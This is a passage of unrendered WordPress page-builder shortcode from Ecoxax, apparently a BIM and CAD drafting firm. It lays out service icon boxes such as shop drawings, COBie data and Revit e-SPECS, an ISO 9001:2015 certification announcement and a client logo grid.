description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026708530{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-dumpster” color_icon=”#d43231″ title=”Shop Drawing Preparation (BIM & CAD)” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026848865{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-business-time” color_icon=”#d43231″ title=”Authority Approval Drawings/GIS for building” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026724514{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-truck-container” color_icon=”#d43231″ title=”Schedule, Material, Quantity information” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603026745816{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}”][/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-ballot-check” color_icon=”#d43231″ title=”e-SPECS for Revit elements” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603136338938{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}” el_class=”iconbox-adjust”].[/g5element_icon_box][g5element_icon_box layout_style=”style-08″ icon_font=”fal fa-database” color_icon=”#d43231″ title=”COBie data on Revit elements” link=”url:https%3A%2F%2Fecoxax.com%2Four-services%2F” switch_show_button=”” title_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%2218%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%22%2C%22hover_color%22%3A%22%22%7D” description_typography=”%7B%22font_family%22%3A%22%22%2C%22font_weight%22%3A%22%22%2C%22font_style%22%3A%22%22%2C%22font_size_lg%22%3A%22%22%2C%22font_size_md%22%3A%22%22%2C%22font_size_sm%22%3A%22%22%2C%22font_size_xs%22%3A%22%22%2C%22align%22%3A%22%22%2C%22text_transform%22%3A%22%22%2C%22line_height%22%3A%22%22%2C%22letter_spacing%22%3A%22%22%2C%22color%22%3A%22%23acacac%22%2C%22hover_color%22%3A%22%22%7D” button_style=”link” button_color=”” css=”.vc_custom_1603136237301{background-color: rgba(20,20,20,0.75) !important;*background-color: rgb(20,20,20) !important;}” el_class=”iconbox-adjust”][/g5element_icon_box][/g5element_slider_container][/vc_column][/vc_row][vc_row full_width=”stretch_row” css=”.vc_custom_1605179139976{background-color: #ffffff !important;}” el_class=”vc-col-no-pt”][vc_column][g5element_space spacing_md=”40″][/vc_column][vc_column css=”.vc_custom_1605179007569{border-bottom-width: 1px !important;background-color: #ffffff !important;border-bottom-color: #2f2668 !important;border-bottom-style: solid !important;}”][vc_row_inner][vc_column_inner width=”1/2″][vc_column_text css=”.vc_custom_1605179797438{padding-top: 20px !important;padding-right: 10px !important;padding-bottom: 10px !important;padding-left: 10px !important;}”]We proudly announce that Ecoxax is now ISO 9001:2015 certified, accredited by ASCB and listed in IRQAO. Having our quality policies defined as per ISO standards; which is the International Standard for Quality Management System (QMS); our clients benefit equally along with us on every stage of engagement.[/vc_column_text][/vc_column_inner][vc_column_inner width=”1/2″][vc_single_image image=”3877″ img_size=”full”][/vc_column_inner][/vc_row_inner][g5element_space spacing=”30″ spacing_md=”20″][/vc_column][/vc_row][vc_row disable_element=”yes”][vc_column][g5element_space spacing=”50″ spacing_md=”30″][g5element_heading title=”SOFTWARE PROFICIENCY” el_class=”pdl-xl-70″][g5element_space spacing=”70″ spacing_md=”50″][/vc_column][/vc_row][vc_row disable_element=”yes” el_class=”clients-grid”][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3574″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3568″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3629″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3566″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3573″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3569″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3571″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3572″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3564″ opacity=”70″ opacity_hover=”100″][/vc_column][vc_column width=”1/2″ offset=”vc_col-md-1/5 vc_col-xs-6″][g5element_client_logo image=”3630″ opacity=”70″ opacity_hover=”100″][/vc_column][/vc_row]